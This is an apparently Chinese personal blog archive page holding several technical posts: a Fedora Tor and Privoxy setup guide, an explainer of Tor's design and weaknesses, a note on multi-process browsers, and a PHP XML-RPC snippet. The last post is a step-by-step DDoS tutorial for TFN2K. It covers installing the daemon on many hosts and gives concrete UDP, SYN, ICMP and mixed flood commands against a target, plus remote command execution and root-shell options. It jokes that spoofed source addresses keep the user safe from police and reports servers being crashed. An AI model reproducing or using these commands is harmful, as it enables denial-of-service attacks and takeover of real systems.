显示标签为“Internet”的博文。显示所有博文
显示标签为“Internet”的博文。显示所有博文

2010年1月22日星期五

Fedora-Tor 安装指南

万里长城万里空,有Tor穿墙不是梦~

fedora上基本步骤是:
yum -y install tor privoxy

然后配置privoxy
gedit /etc/privoxy/config

复制粘帖下面那段配置:


# Tor listens as a SOCKS4a proxy here:
forward-socks4a / 127.0.0.1:9050 . #.不要漏掉
confdir /etc/privoxy
logdir /var/log/privoxy

logfile logfile

#actionsfile standard # Internal purpose, recommended 在3.0.3-beta里面没了
actionsfile default # Main actions file 这里的default.action要看文件啊
actionsfile user # User customizations
filterfile default.filter

# Don't log interesting things, only startup messages, warnings and
errors
#logfile logfile
#jarfile jarfile
#debug 0 # show each GET/POST/CONNECT request
debug 4096 # Startup banner and warnings
debug 8192 # Errors - *we highly recommended enabling this*

user-manual /usr/share/doc/privoxy/user-manual
listen-address 127.0.0.1:8118
toggle 1
enable-remote-toggle 0
enable-edit-actions 0
enable-remote-http-toggle 0
buffer-limit 4096


然后装vidalia

yum -y install vidalia vidalia-doc

然后装火狐torbutton插件

装完配置完成以后要给bridges@torproject.org发一封邮件

>

> 邮件可以不需要标题,邮件的内容为get bridges

>
收到以后把给你的网桥按说明添加上去~

>

>填在settings -> network -> My ISP blocks the connections to the Tor netowork

>
把火狐那个torbutton激活就可以了~

>

>同学向我反应torbutton发生.js错误,那么其实一点关系都没有。

>按一下操作一样可以使用:

>preferences -> general -> network -> settings

>选择手动配置代理:在 http&ssl&socks的地方填127.0.0.1;端口前两个是8118端口,后面

>一个是9050端口。socks选v4 | v5的没关系的。

>

>windows用的软件也是这几个,但偶没有windows,大家自己试试吧~好像有一个套件的

>Vidalia Bundle已经3合一套装了~

>Have fun!

>

2010年1月17日星期日

深入Tor

背景

TOR(The Onion Router) 通过一系列的网络节点让你的建立匿名的安全数据链路。他是免费的,是一个开源项目,任何人都能够使用他。

TOR网络有两大类组成,TOR服务器和TOR用户。任何TOR用户都可以成为TOR服务器,但是没有人可以“拥有”所有的服务。

TOR每条链路由3个节点建立起来,并且每几分钟就改变链路。链路是由一些主要节点管理节点列表随机产生的。TOR建立一个客户端到第一个节点的链接(通常称作入口节点),然后它向第二个节点发送一个打开信号,最后是第三个节点(通常称为出口节点)。

因此,当你在浏览网页的时候,你通过了3个世界上的任意节点。

You -> Node1 -> Node2 -> Node3 -> www.google.com

TOR依赖于层层加密,这就意味着每个节点都只能只能看到他需要看到的内容。而不能里解密所有数据。

一、安全性和隐私性

Node1

节点1的所有者只能知道谁是那个想要匿名上网的人,但不知道他的数据,因为数据是加密的。所以节点1所有者不知道我想干什么,但知道我是谁。

Node2

节点2的所有者,事实上什么也不知道。他不知道谁在请求数据,因为所有数据都被Node1加密了,数据内容当然就更加不知道了。

Node3

节点3的拥有者不知道谁请求了这个内容,但他知道内容,因为节点3能够解密数据。节点3是有有解密的密钥的,因为我们要依赖他去访问我们要访问的网站(网站一般是不加密的)。

进一步讨论

Node1 + Node2

如果我拥有1,2两个节点,这个也没什么好处,因为我还是只能看见这个人是谁,而不知到他想要什么。

Node2 + Node3

同样拥有2,3两个节点也不怎么理想。我还是只知道对方想要访问的数据,而不知道他是谁。

Node1 + Node3

如果拥有1,3节点,对于想了解谁在用TOR的黑客我将更加有帮助。节点1知道用户的身份,节点3能够解密。但要知道所有的数据内容还是有一点困难的。

让我们假设A建立了一下链接

Node1 -> Node2 -> Node3

现在A想要匿名浏览google。那么,节点1就得到了A发出的请求,但是我们并不知道A想要什么。然后,我们知道有个人在节点3请求google主页,链接那个节点,我们就说A就是请求google的那个人那几乎是不可能的,因为同时会有成百上千个用户。攻击者不能确定通过节点1的A就是通过节点3访问某个特定页面的同一个人。

要知道用户身份和请求数据的唯一方法就是计算从节点1到一个不知道的节点,到节点3需要的平均时间。然后假设符合平均时间的就是同一个用户。

Node1+Node2+Node3

毫无疑问,如果拥有所有的三个节点,你就能知道是谁发了这条信息以及信息的内容。但这个基本上是不可能的。因为链路是在节点列表里面任意选择的,而TOR节点列表有着相当客观的机诶但数量(接近1800)。

现在让我们进一步假设,如果有人黑了你的电脑并且用数据包嗅探来监视你离开你电脑的每一个数据包。感谢加密机制,攻击者知道的只有第一个节点的身份而已,没有任何的数据,连出口是谁都没法知道。


二、特别优点

TOR同样解决了一个别的匿名访问程序没有解决的问题,那就是DNS服务器能够得知

任何请求域名解析的用户身份。那就是说如果我想匿名访问google.com,使用任何匿名工具,google查了日志也不会知道我是谁,但他们可以通过查询通过查询DNS服务器知道我的身份,因为每次你在地址栏输入一个域名,后台就会发送一个DNS解析请求(使用我的非匿名身份)。

TOR通过Privoxy这个程序使得DNS请求变为匿名。

你可以看到,想要窃听TOR用户是非常困难的。


三、缺陷

易破坏性问题:

据我所知道的,TOR只有连点比较容易受损:

1. 通过一个特殊的Java applet程序发送ICMP数据包(TOR不支持ICMP的加密),网站就可以推断出用户的真实身份。

2.另一种方法就是攻击者拥有出口节点Node3。然后攻击者可以向将会送回最初节点的访问页注入Javascript代码或者Java applet程序,从而推断用户身份。

速度问题:

不像其他的匿名访问程序,TOR是非常缓慢的,因为他的所有内容都要加密,而且还要满世界的向三个节点传递数据。

一般情况,TOR用户可以获得速度在20-35kbps左右,当然还跟你的地理位置和带宽有关。


P.S.

torproject.org (被墙)提供了一个叫做Vidalia Bundle工具,包括了Tor + Privoxy + Vidalia (Tor的图形化控制) + Torbutton (firefox插件).


原文:http://www.anonwatch.com/?p=3

多进程浏览器优点

多进程浏览技术好处多多,它能使每一个打开的页面都可以运行在各自独立的进程中,为浏览器的安全性和稳定性增色不少,即使其中的一个页面因故出错,也不会影响到其它页面和整个浏览器的运行状况。

1.稳定性增强:

  如果某款插件试图占用全部处理器时间和内存空间,并容易造成崩溃,那么多进程式浏览可以把它于浏览器的其它部分分割开来;

  2.性能:

  多进程式浏览技术可以充分利用现代多核处理器的优势,同时用户接口界面的响应速度也将有所提高;

  3.安全:

  由于各个网页相对独立,因此多进程式浏览将能更有效地防御通过网页发起的攻击。

2009年8月1日星期六

ippbx我长见识了

wiki了一下,ippbx貌似支持的是xml-rpc的数据传输形式。而我感觉那个ethereal似乎只是测试用的,知道有反应了。

因此ippbx配置里面的
config_url = reg.php就表示ippbx向这个页面发送了数据。

php中正好有xml-rpc的扩展http://phpxmlrpc.sourceforge.net/
xml数据是以gobal request的形式传输过来的,因此只要获取gobal request就可以了,基本用法如下:

// this is the function exposed as "get_time()"
function return_time($method, $args) {
return date('Ymd\THis');
}

$server = xmlrpc_server_create() or die("Can't create server");
xmlrpc_server_register_method($server, 'return_time', 'get_time')
or die("Can't register method.");

$request = $GLOBALS['HTTP_RAW_POST_DATA'];
$options = array('output_type' => 'xml', 'version' => 'xmlrpc');

print xmlrpc_server_call_method($server, $request, NULL, $options)
or die("Can't call method");

xmlrpc_server_destroy($server);

就生成了xml这样,就可以进一步用php解析这一个请求了,貌似是这样的。你先试试看。

2009年3月8日星期日

Linux操作系统中实现DDOS攻击的方法

软件用的是最有名的DDOS,首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHAT Linux进行测试,本次攻击测试我使用的是FEDORA 10。
  开始设置服务器:

  解压 tar -zxvf tfn2k.tgz

  1.安装TFN2K

  TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不同的设置。

  先修改src/ip.h

  注释掉以下部分,否则编译出错。

  /*struct in_addr

  {

  unsigned long int s_addr;

  }; */

  然后make进行编译

  编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程。而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻 击无效,更改密码可以执行mkpass进行更改。最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录 所有的客户机IP地址(用VI编辑一个就可行了),格式为:

  192.168.0.1

  192.168.0.2

  192.168.0.3

  IP

  IP

  .....

  然后在主服务器上运行./tfn

  2.DDOS攻击实现

  ./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了:)

  格式./tfn <参数>

  无用的参数我们不提,我们来说攻击用的

  -f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS

  -h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址

  -p 后面指定一个端口,不用说了

  -c 最关键的参数,一共有11个选相

  0 - 停止攻击,发善心用的

  1 - 反欺骗等级设定 ,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈

  2 - 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。

 3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。

  4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。

  5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.

  6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。

  7 - SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。

  8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸:)

  9 - TARGA3攻击

  10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:

  ./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"

  参数基本说完,下面攻击

  ./tfn -f hostext -c 4 -i www.xxx.com

  使用hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动td进程)

  ./tfn -f hostext -c 5 -i www.xxx.com -p 80

  使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)

  ./tfn -f hostext -c 6 -i www.xxx.com

  使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)

  ./tfn -f hostext -c 8 -i www.xxx.com

  使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是sniffer一定哭死)

  ./tfn -f hostext -c 0

  让所由主机停止攻击

  基本说完,最后说说我的测试结果

  一对一攻击,攻击方式TCP 连接方式本地 本地CPU13% 被攻击的服务器CPU使用率70%以上,并时时波动

  二对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器CPU使用率100%

  五对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器死机.本人家里只有6台机器,但如果再多点,几十台机器,一般的个人服务器肯定要死掉了

  一对一攻击,攻击方式ICMP 连接方式本地 本地CPU18% 被攻击的服务器CPU使用率96%以上,并时时波动二对一攻击,攻击方式ICMP 连接方式本地 本地单机CPU18% 被攻击的服务器以经无法上网,几乎无法使用,半小时内死机。